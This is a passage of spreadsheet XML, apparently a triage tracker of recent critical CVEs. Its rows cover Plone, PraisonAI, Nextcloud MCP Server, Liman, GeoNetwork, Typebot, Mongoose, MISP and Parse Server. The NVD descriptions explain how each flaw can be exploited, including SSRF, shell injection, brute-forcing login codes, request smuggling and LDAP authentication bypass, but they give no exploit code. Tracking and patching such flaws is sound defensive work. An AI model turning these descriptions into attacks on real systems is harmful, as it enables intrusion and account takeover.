          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>plone.app.event provides the event content type for Plone. Prior to versions 5.2.4 and 6.0.1, the iCalendar import in src/plone/app/event/ical/importer.py accepts insufficiently restricted calendar and event URLs, does not adequately bound downloaded bytes or imported events, and commits work per event. A logged-in editor can make the server request internal network resources or local calendar files, exhaust resources and take the site offline, and store a malicious event URL that executes script in another user's browser. The fix restricts accepted URLs, applies MAXIMUM_ICAL_IMPORT_SIZE_BYTES and MAXIMUM_ICAL_IMPORT_EVENTS limits, uses transaction savepoints, and validates event URLs. This issue is fixed in versions 5.2.4 and 6.0.1.</t>
        </is>
      </c>
      <c r="S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55247</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55248</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>plone.app.portlets provides portlets and a Plone-specific user interface for plone.portlets. Prior to 5.0.8, 6.0.4, and 7.0.2, a member who can add an RSS portlet can set its feed URL to a very large response, causing src/plone/app/portlets/portlets/rss.py to download and retain excessive data in memory and deny service. The same RSS URL handling accepts internal hosts, IP addresses, single-word domains, and explicit ports, allowing server-side requests that can probe internal network services and open ports. A malicious feed item can also supply a JavaScript URL that is retained as the item link and can execute script when used by a victim. The affected logic includes _rss_feed_url_validator, _normal_url_validator, RSSFeed._retrieveFeed, RSSFeed._buildItemDict, and the FEED_DATA in-memory cache. This issue is fixed in versions 5.0.8, 6.0.4, and 7.0.2.</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55248</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55536</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-625</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, Browser Server _handle_connection() checks Chrome extension origins with re.match() and the unanchored expression chrome-extension://[a-z0-9]{32}. Extra trailing characters pass before websocket.accept(), allowing start_session commands and unauthorized browser automation. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55536</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55640</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>Nextcloud MCP Server is a production-ready MCP server that connects AI assistants to a Nextcloud instance. Prior to 0.117.2, the POST /webhooks/nextcloud endpoint in nextcloud_mcp_server/vector/webhook_receiver.py has no authentication by default because WEBHOOK_SECRET defaults to None and startup validation does not require it. When WEBHOOK_SECRET is unset, handle_nextcloud_webhook() accepts unauthenticated requests. The payload["user"]["uid"] field parsed in nextcloud_mcp_server/vector/webhook_parser.py is attacker-controlled and is used without an authenticated-session cross-check for Qdrant operations, allowing a network attacker to delete or trigger re-indexing of vector embeddings for any user and to destroy the semantic search index by sending forged deletion events. This issue is fixed in version 0.117.2.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55640</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57499</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>Liman is open source server management software. Prior to 2.2.2 - 1103, an OS command injection vulnerability in the log rotation configuration endpoint allows an authenticated administrator to execute arbitrary operating system commands on the Liman server. The `ip_address` parameter is embedded directly into a shell command without sanitization, enabling shell escape via single-quote injection. This is fixed in 2.2.2 - 1103.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57499</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58400</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the Saxon XSLT processor used to render formatters is configured without secure processing (`FEATURE_SECURE_PROCESSING`) and without disabling Java extension functions (`ALLOW_EXTERNAL_FUNCTIONS`). Any stylesheet loaded by GeoNetwork can therefore invoke
`java.lang.Runtime.exec()` or `java.lang.ProcessBuilder` directly, achieving arbitrary command execution as the GeoNetwork process user. A user with sufficient privileges to upload a formatter can deliver a `.xsl` file containing Java extension call that execute arbitrary OS commands with the privileges of the GeoNetwork process. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58400</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62862</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-307, CWE-330</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>Typebot is an open-source chatbot builder. In self-hosted versions up to and including 3.17.1, the default passwordless email magic-link authentication is vulnerable to login-code brute forcing that leads to account takeover. The email provider overrides NextAuth's default cryptographically secure token with a 6-digit code generated using Math.random(), reducing the keyspace to 900,000 with a 10-minute expiry, and the code itself is the raw value placed in the magic link. The verification callback enforces no attempt limit, lockout, or CSRF protection, and an incorrect guess does not consume the real code because the adapter returns null on a not-found token, so a valid code survives unlimited guessing within its lifetime. The only rate limiter applies to the code-sending path and is keyed on the client-controlled X-Forwarded-For header, allowing an attacker to request many concurrent live codes for one victim and further raise the odds of a matching guess. As a result, an anonymous attacker who knows a victim's email address can brute-force the callback and obtain an authenticated session as that user with no victim interaction, gaining full access to the victim's bots, results, and connected integration credentials. Deployments configured for OAuth or SSO only, with no email provider, are not affected. This issue is fixed in version 3.18.0</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62862</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73253</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to version 7.22, an on-path network attacker with a wildcard certificate for a parent domain can impersonate deeper subdomains to a client using the built-in TLS stack. The mg_tls_verify_cert_san() and mg_tls_verify_cert_cn() functions in src/tls_builtin.c call mg_match(), whose wildcard can cross DNS label boundaries, so a pattern such as *.example.com can match foo.bar.example.com. The resulting hostname verification bypass permits interception and modification of TLS traffic. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73253</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73256</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote unauthenticated attacker can exploit an HTTP/1.0 reverse-proxy deployment by sending a request with Transfer-Encoding: chunked and conflicting framing. The http_cb() function in src/http.c tests hm.proto.len with an impossible greater-than-eight condition even though mg_http_parse() requires an eight-byte protocol string, so is_http_1_0 is never set. Mongoose consequently processes chunked encoding that an HTTP/1.0 proxy can ignore, enabling request smuggling and unauthorized access or state changes. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73256</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73257</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Priro to version 7.22, a remote unauthenticated attacker can send an HTTP request containing both Content-Length and Transfer-Encoding: chunked. The cl_count and te_count checks in the mg_http_parse() and http_cb() paths in src/http.c accept both headers and prioritize chunked encoding, while a Content-Length-preferring reverse proxy can use a different request boundary. This CL.TE desynchronization can inject requests that access or modify resources in another user context. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73257</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75340</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>The device metadata import interface /device/instance/{productId}/property-metadata/import of jetlinks community 2.11 is vulnerable to Server-side request forgery (SSRF).</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75340</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77337</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-770</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CakePHP Authentication is an authentication plugin for CakePHP that can also be used in PSR-7 based applications. Versions before 2.11.2, from 3.0.0 through 3.3.6, and from 4.0.0 through 4.2.0 allow authentication bypass and potential CPU or memory exhaustion when CookieAuthenticator uses unencrypted, forgeable legacy tokens. This issue is fixed in versions 2.11.2, 3.3.7, and 4.2.1.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77337</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80164</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R158"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158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80164</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86419</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain insufficient validation of server-side outbound HTTP destinations in feed retrieval and TAXII discovery functionality.
In feed processing, redirects were followed without validating the redirect scheme or destination. The original request headers were reused across redirect hops, meaning authentication headers or API credentials configured for a feed could be forwarded to a different host. Redirects could also target internal network resources, resulting in SSRF. The fix adds redirect validation, blocks internal destinations for cross-host redirects, strips configured feed credentials before following redirects to another host, and pins validated DNS results to prevent re-resolution after validation.
The TAXII discovery endpoint had a related incomplete SSRF defense. It used gethostbyname() and compared the result against only a few literal addresses. This missed cases including IPv6 loopback (::1), numeric host encodings such as 0x7f000001, and potentially multiple DNS records. The fix moves TAXII discovery to the shared URL egress validator.
Together, these commits harden MISP's outbound URL handling against alternate-address representations, DNS-related bypasses, unsafe redirects, internal-host access, and cross-host credential forwarding.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86419</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87806</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>Parse Server versions &lt;= 8.6.87 and &gt;= 9.0.0 &lt; 9.10.1-alpha.7 contain an authentication bypass in the built-in LDAP authentication adapter. The adapter forwarded the client-supplied password to the directory without verifying that a password had been supplied, and treated any non-error response from the directory as proof of authentication. A zero-length credential turns an LDAP simple bind into the unauthenticated authentication mechanism described in RFC 4513 section 5.1.2, which some directories (including Active Directory in its default configuration) answer with success while mapping the connection to anonymous. As a result, an unauthenticated attacker who knows a directory username can obtain a valid session token for that account, resulting in account takeover. Only deployments that enable the LDAP authentication adapter are affected, and deployments whose directory refuses unauthenticated simple bind (such as a stock OpenLDAP configuration) are not exploitable. The issue is fixed in 8.6.88 and 9.10.1-alpha.7, which require the password to be a non-empty string and reject the request before contacting the directory.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87806</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67403</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
